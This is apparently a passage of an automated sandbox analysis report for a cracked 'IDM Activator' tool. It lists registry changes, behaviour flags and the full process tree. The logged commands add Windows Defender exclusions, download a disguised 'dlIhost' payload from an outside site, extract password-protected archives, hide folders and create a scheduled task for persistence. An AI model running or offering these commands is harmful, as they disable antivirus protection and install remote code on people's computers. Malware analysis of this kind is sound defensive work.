| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\DownlWithIDM.LinkProcessor.1\CLSID\ = "{52F6F7BD-DF73-44B3-AE13-89E1E1FB8F6A}" | C:\Program Files (x86)\Internet Download Manager\IDMan.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{436D67E1-2FB3-4A6C-B3CD-FF8A41B0664D} | C:\Program Files (x86)\Internet Download Manager\IDMan.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\IDMan.CIDMLinkTransmitter\CLSID\ = "{AC746233-E9D3-49CD-862F-068F7B7CCCA4}" | C:\Program Files (x86)\Internet Download Manager\IDMan.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0055C089-8582-441B-A0BF-17B458C2A3A8}\TypeLib | C:\Program Files (x86)\Internet Download Manager\IDMan.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CDC95B92-E27C-4745-A8C5-64A52A78855D}\InProcServer32\ = "C:\\Program Files (x86)\\Internet Download Manager\\IDMShellExt64.dll" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{37294E01-DB54-43AF-9D50-93FF7267DF5D}\1.0\HELPDIR\ = "C:\\Program Files (x86)\\Internet Download Manager" | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CDD67718-A430-4AB9-A939-83D9074B0038}\InprocServer32\ThreadingModel = "Apartment" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0055C089-8582-441B-A0BF-17B458C2A3A8}\TypeLib\ = "{3BDFC55C-ED33-43BB-9A77-57C2AF4B56EF}" | C:\Program Files (x86)\Internet Download Manager\IDMan.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F947660-8606-420A-BAC6-51B84DD22A47}\VersionIndependentProgID\ = "Idmfsa.IDMEFSAgent" | C:\Program Files (x86)\Internet Download Manager\IDMan.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0055C089-8582-441B-A0BF-17B458C2A3A8}\InprocServer32 | C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\DownlWithIDM.V2LinkProcessor\ = "V2LinkProcessor Class" | C:\Program Files (x86)\Internet Download Manager\IDMan.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{AC746233-E9D3-49CD-862F-068F7B7CCCA4}\AppID = "{AC746233-E9D3-49CD-862F-068F7B7CCCA4}" | C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\reg.exe | N/A |
| N/A | N/A | C:\Windows\System32\reg.exe | N/A |
| N/A | N/A | C:\Windows\System32\reg.exe | N/A |
| N/A | N/A | C:\Windows\System32\reg.exe | N/A |
| N/A | N/A | C:\Windows\System32\reg.exe | N/A |
| N/A | N/A | C:\Windows\System32\reg.exe | N/A |
| N/A | N/A | C:\Windows\System32\reg.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 254819.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Internet Download Manager\IDMan.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\IDM 6.xx Activator or Resetter v3.3 by CrackingCity Team\IDM 6.xx Activator or Resetter v3.3\IDM 6.x.exe
"C:\Users\Admin\AppData\Local\Temp\IDM 6.xx Activator or Resetter v3.3 by CrackingCity Team\IDM 6.xx Activator or Resetter v3.3\IDM 6.x.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ytmp\main.bat" "
C:\Windows\SysWOW64\attrib.exe
ATTRIB -S +H .
C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe
7za e files.tmp -ptmp@tmp420 -aoa IDM0.bat
C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe
7za e files.tmp -ptmp@tmp420 -aoa IDM.bat
C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe
7za e files.tmp -ptmp@tmp420 -aoa NSudo86x.exe
C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe
7za e files.tmp -ptmp@tmp420 -aoa AB2EF.exe
C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe
7za e files.tmp -ptmp@tmp420 -aoa UpdateTask.xml
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ytmp\IDM0.bat" "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ytmp\IDM.bat" "
C:\Windows\SysWOW64\reg.exe
REG QUERY "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "ShowSuperHidden"
C:\Windows\SysWOW64\find.exe
FIND /I "1"
C:\Windows\SysWOW64\reg.exe
REG QUERY "HKLM\Hardware\Description\System\CentralProcessor\0"
C:\Windows\SysWOW64\find.exe
FIND /I "x86"
C:\Windows\SysWOW64\attrib.exe
ATTRIB +S +H "C:\Users\Admin\AppData\Roaming\DLL"
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ytmp\IDM.bat" r1"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
POWERSHELL -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\DLL" -Force
C:\Windows\System32\sc.exe
sc query Null
C:\Windows\System32\find.exe
find /i "RUNNING"
C:\Windows\System32\findstr.exe
findstr /v "$" "IDM.bat"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ver
C:\Windows\System32\reg.exe
reg query "HKCU\Console" /v ForceV2
C:\Windows\System32\find.exe
find /i "0x0"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c echo prompt $E | cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo prompt $E "
C:\Windows\System32\cmd.exe
cmd
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe "$f=[io.file]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\ytmp\IDM.bat') -split ':PowerShellTest:\s*';iex ($f[1])"
C:\Windows\System32\find.exe
find /i "FullLanguage"
C:\Windows\System32\fltMC.exe
fltmc
C:\Windows\System32\conhost.exe
conhost.exe powershell.exe "$t=[AppDomain]::CurrentDomain.DefineDynamicAssembly(4, 1).DefineDynamicModule(2, $False).DefineType(0); $t.DefinePInvokeMethod('GetStdHandle', 'kernel32.dll', 22, 1, [IntPtr], @([Int32]), 1, 3).SetImplementationFlags(128); $t.DefinePInvokeMethod('SetConsoleMode', 'kernel32.dll', 22, 1, [Boolean], @([IntPtr], [Int32]), 1, 3).SetImplementationFlags(128); $k=$t.CreateType(); $b=$k::SetConsoleMode($k::GetStdHandle(-10), 0x0080); & cmd.exe '/c' '"""C:\Users\Admin\AppData\Local\Temp\ytmp\IDM.bat""" -el r1 -qedit'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe "$t=[AppDomain]::CurrentDomain.DefineDynamicAssembly(4, 1).DefineDynamicModule(2, $False).DefineType(0); $t.DefinePInvokeMethod('GetStdHandle', 'kernel32.dll', 22, 1, [IntPtr], @([Int32]), 1, 3).SetImplementationFlags(128); $t.DefinePInvokeMethod('SetConsoleMode', 'kernel32.dll', 22, 1, [Boolean], @([IntPtr], [Int32]), 1, 3).SetImplementationFlags(128); $k=$t.CreateType(); $b=$k::SetConsoleMode($k::GetStdHandle(-10), 0x0080); & cmd.exe '/c' '\"C:\Users\Admin\AppData\Local\Temp\ytmp\IDM.bat\" -el r1 -qedit'"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ""C:\Users\Admin\AppData\Local\Temp\ytmp\IDM.bat" -el r1 -qedit"
C:\Windows\System32\sc.exe
sc query Null
C:\Windows\System32\find.exe
find /i "RUNNING"
C:\Windows\System32\findstr.exe
findstr /v "$" "IDM.bat"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ver
C:\Windows\System32\reg.exe
reg query "HKCU\Console" /v ForceV2
C:\Windows\System32\find.exe
find /i "0x0"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c echo prompt $E | cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo prompt $E "
C:\Windows\System32\cmd.exe
cmd
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe "$f=[io.file]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\ytmp\IDM.bat') -split ':PowerShellTest:\s*';iex ($f[1])"
C:\Windows\System32\find.exe
find /i "FullLanguage"
C:\Windows\System32\fltMC.exe
fltmc
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe "Get-WmiObject -Class Win32_ComputerSystem | Select-Object -Property CreationClassName"
C:\Windows\System32\find.exe
find /i "computersystem"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe "([System.Security.Principal.NTAccount](Get-WmiObject -Class Win32_ComputerSystem).UserName).Translate([System.Security.Principal.SecurityIdentifier]).Value" 2>nul
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe "([System.Security.Principal.NTAccount](Get-WmiObject -Class Win32_ComputerSystem).UserName).Translate([System.Security.Principal.SecurityIdentifier]).Value"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
POWERSHELL -Command Add-MpPreference -ExclusionProcess "dlIhost.exe" -Force
C:\Windows\System32\reg.exe
reg query HKU\\Software
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe "$explorerProc = Get-Process -Name explorer | Where-Object {$_.SessionId -eq (Get-Process -Id $pid).SessionId} | Select-Object -First 1; $sid = (gwmi -Query ('Select * From Win32_Process Where ProcessID=' + $explorerProc.Id)).GetOwnerSid().Sid; $sid" 2>nul
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe "$explorerProc = Get-Process -Name explorer | Where-Object {$_.SessionId -eq (Get-Process -Id $pid).SessionId} | Select-Object -First 1; $sid = (gwmi -Query ('Select * From Win32_Process Where ProcessID=' + $explorerProc.Id)).GetOwnerSid().Sid; $sid"
C:\Windows\System32\reg.exe
reg query HKU\S-1-5-21-1230210488-3096403634-4129516247-1000\Software
C:\Windows\System32\reg.exe
reg delete HKCU\IAS_TEST /f
C:\Windows\System32\reg.exe
reg delete HKU\S-1-5-21-1230210488-3096403634-4129516247-1000\IAS_TEST /f
C:\Windows\System32\reg.exe
reg add HKCU\IAS_TEST
C:\Windows\System32\reg.exe
reg query HKU\S-1-5-21-1230210488-3096403634-4129516247-1000\IAS_TEST
C:\Windows\System32\reg.exe
reg delete HKCU\IAS_TEST /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
POWERSHELL -Command Add-MpPreference -ExclusionProcess "NSudo86x.exe" -Force
C:\Windows\System32\reg.exe
reg delete HKU\S-1-5-21-1230210488-3096403634-4129516247-1000\IAS_TEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v PROCESSOR_ARCHITECTURE
C:\Windows\System32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v PROCESSOR_ARCHITECTURE
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKU\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\DownloadManager" /v ExePath 2>nul
C:\Windows\System32\reg.exe
reg query "HKU\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\DownloadManager" /v ExePath
C:\Windows\System32\reg.exe
reg add HKU\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Classes\Wow6432Node\CLSID\IAS_TEST
C:\Windows\System32\reg.exe
reg query HKU\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Classes\Wow6432Node\CLSID\IAS_TEST
C:\Windows\System32\reg.exe
reg delete HKU\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Classes\Wow6432Node\CLSID\IAS_TEST /f
C:\Windows\System32\mode.com
mode 75, 28
C:\Windows\System32\choice.exe
choice /C:1234567 /N
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
POWERSHELL -Command Add-MpPreference -ExclusionProcess "7za.exe" -Force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
POWERSHELL -Command "Invoke-WebRequest 'https://www.crackingcity.com/VScan/dlIhost.7z' -OutFile 'C:\Users\Admin\AppData\Roaming\DLL\dlIhost.7z'"
C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe
7za e "C:\Users\Admin\AppData\Roaming\DLL\dlIhost.7z" -o"C:\Users\Admin\AppData\Roaming\DLL" -pun#912345678@rar -aoa
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /xml ".\UpdateTask.xml" /tn "UpdateTask" /f
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.internetdownloadmanager.com/download.html
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd0d913cb8,0x7ffd0d913cc8,0x7ffd0d913cd8
C:\Windows\System32\mode.com
mode 75, 28
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1924,12383606183774892261,11660251557956546447,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1936 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1924,12383606183774892261,11660251557956546447,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2300 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1924,12383606183774892261,11660251557956546447,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2580 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,12383606183774892261,11660251557956546447,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,12383606183774892261,11660251557956546447,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\choice.exe
choice /C:1234567 /N
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,12383606183774892261,11660251557956546447,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5112 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1924,12383606183774892261,11660251557956546447,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3952 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1924,12383606183774892261,11660251557956546447,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5296 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1924,12383606183774892261,11660251557956546447,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5884 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,12383606183774892261,11660251557956546447,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5216 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,12383606183774892261,11660251557956546447,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5188 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,12383606183774892261,11660251557956546447,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4980 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,12383606183774892261,11660251557956546447,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5124 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1924,12383606183774892261,11660251557956546447,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5248 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\Downloads\idman642build9.exe
"C:\Users\Admin\Downloads\idman642build9.exe"
C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp
"C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp" -d "C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1924,12383606183774892261,11660251557956546447,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=6184 /prefetch:2
C:\Windows\SysWOW64\regsvr32.exe
"C:\Windows\System32\regsvr32.exe" /s "C:\Program Files (x86)\Internet Download Manager\IDMIECC64.dll"
C:\Windows\SysWOW64\regsvr32.exe
"C:\Windows\System32\regsvr32.exe" /s "C:\Program Files (x86)\Internet Download Manager\IDMGetAll64.dll"
C:\Windows\SysWOW64\regsvr32.exe
"C:\Windows\System32\regsvr32.exe" /s "C:\Program Files (x86)\Internet Download Manager\downlWithIDM64.dll"
C:\Windows\system32\regsvr32.exe
/s "C:\Program Files (x86)\Internet Download Manager\IDMIECC64.dll"
C:\Program Files (x86)\Internet Download Manager\idmBroker.exe
"C:\Program Files (x86)\Internet Download Manager\idmBroker.exe" -RegServer
C:\Windows\system32\regsvr32.exe
/s "C:\Program Files (x86)\Internet Download Manager\IDMGetAll64.dll"
C:\Windows\system32\regsvr32.exe
/s "C:\Program Files (x86)\Internet Download Manager\downlWithIDM64.dll"
C:\Program Files (x86)\Internet Download Manager\IDMan.exe
"C:\Program Files (x86)\Internet Download Manager\IDMan.exe" /rtr
C:\Windows\SysWOW64\regsvr32.exe
"C:\Windows\System32\regsvr32.exe" /s "C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll"
C:\Windows\SysWOW64\regsvr32.exe
"C:\Windows\System32\regsvr32.exe" /s "C:\Program Files (x86)\Internet Download Manager\IDMIECC64.dll"
C:\Windows\SysWOW64\regsvr32.exe
"C:\Windows\System32\regsvr32.exe" /s "C:\Program Files (x86)\Internet Download Manager\IDMGetAll64.dll"
C:\Windows\SysWOW64\regsvr32.exe
"C:\Windows\System32\regsvr32.exe" /s "C:\Program Files (x86)\Internet Download Manager\downlWithIDM64.dll"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1924,12383606183774892261,11660251557956546447,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5028 /prefetch:8
C:\Windows\system32\regsvr32.exe
/s "C:\Program Files (x86)\Internet Download Manager\IDMIECC64.dll"
C:\Windows\system32\regsvr32.exe
/s "C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll"
C:\Windows\system32\regsvr32.exe
/s "C:\Program Files (x86)\Internet Download Manager\IDMGetAll64.dll"
C:\Windows\system32\regsvr32.exe
/s "C:\Program Files (x86)\Internet Download Manager\downlWithIDM64.dll"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.internetdownloadmanager.com/support/installffextfrommozillasite.html
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.internetdownloadmanager.com/support/installffextfrommozillasite.html
C:\Program Files (x86)\Internet Download Manager\Uninstall.exe
"C:\Program Files (x86)\Internet Download Manager\Uninstall.exe" -instdriv
C:\Windows\system32\RUNDLL32.EXE
"C:\Windows\Sysnative\RUNDLL32.EXE" SETUPAPI.DLL,InstallHinfSection DefaultInstall 128 C:\Program Files (x86)\Internet Download Manager\idmwfp.inf
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3612.0.1226571006\678573561" -parentBuildID 20230214051806 -prefsHandle 1744 -prefMapHandle 1736 -prefsLen 22074 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c7214042-5c57-49c4-8d97-e3d547551ce4} 3612 "\\.\pipe\gecko-crash-server-pipe.3612" 1824 1e053c0de58 gpu
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall
C:\Windows\system32\DrvInst.exe
DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{2f9684f2-da6a-5a48-8b01-4830c6fbeb05}\idmwfp.inf" "9" "4fc2928b3" "0000000000000148" "WinSta0\Default" "0000000000000158" "208" "C:\Program Files (x86)\Internet Download Manager"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3612.1.1792137730\2006831141" -parentBuildID 20230214051806 -prefsHandle 2388 -prefMapHandle 2384 -prefsLen 22925 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4f220e8c-20e2-444b-bc11-c388aa8f671a} 3612 "\\.\pipe\gecko-crash-server-pipe.3612" 2408 1e046f89c58 socket
C:\Windows\system32\DrvInst.exe
DrvInst.exe "8" "4" "C:\Windows\System32\DriverStore\FileRepository\idmwfp.inf_amd64_8b0ebbc2b4585464\idmwfp.inf" "0" "4fc2928b3" "0000000000000158" "WinSta0\Default"
C:\Windows\system32\runonce.exe
"C:\Windows\system32\runonce.exe" -r
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3612.2.1132579876\857923750" -childID 1 -isForBrowser -prefsHandle 3000 -prefMapHandle 3064 -prefsLen 22963 -prefMapSize 235121 -jsInitHandle 1332 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f5fd94bb-cfbe-4f0d-9d27-206275e5f36f} 3612 "\\.\pipe\gecko-crash-server-pipe.3612" 3128 1e056d45258 tab
C:\Program Files\Mozilla Firefox\firefox.exe
